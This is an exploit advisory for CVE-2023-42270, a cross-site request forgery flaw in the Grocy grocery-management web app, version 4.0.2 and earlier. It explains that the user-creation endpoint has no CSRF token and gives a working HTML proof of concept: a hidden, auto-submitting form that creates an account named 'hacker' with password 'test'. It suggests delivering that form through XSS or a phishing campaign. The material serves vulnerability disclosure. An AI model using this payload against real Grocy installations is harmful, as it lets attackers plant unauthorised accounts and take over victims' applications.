Grocy 4.0.2 Cross Site Request Forgery

`# Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability  
# Application: Grocy  
# Version: <= 4.0.2  
# Date: 09/21/2023  
# Exploit Author: Chance Proctor  
# Vendor Homepage: https://grocy.info/  
# Software Link: https://github.com/grocy/grocy  
# Tested on: Linux  
# CVE : CVE-2023-42270  
  
  
  
Overview  
==================================================  
When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting.  
This makes it easy to adjust your request since it is a known format.   
There is also no CSRF Token or other methods of verification in place to verify where the request is coming from.  
This allows for html code to generate a new user as long as the target is logged in and has Create User Permissions.  
  
  
  
Proof of Concept  
==================================================  
Host the following html code via a XSS or delivery via a phishing campaign:  
  
<html>  
<form action="/api/users" method="post" enctype="application/x-www-form-urlencoded">  
<input name='username' value='hacker' type='hidden'>  
<input name='password' value='test' type='hidden'>  
<input type=submit>  
</form>  
<script>  
history.pushState('','', '/');  
document.forms[0].submit();  
</script>  
</html>  
  
  
If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials  
  
Username: hacker  
Password: test  
  
Note:  
In order for this to work, the target must have Create User Permissions.  
This is enabled by default.  
  
  
  
Proof of Exploit/Reproduce  
==================================================  
http://xploit.sh/posts/cve-2023-42270/  
  
`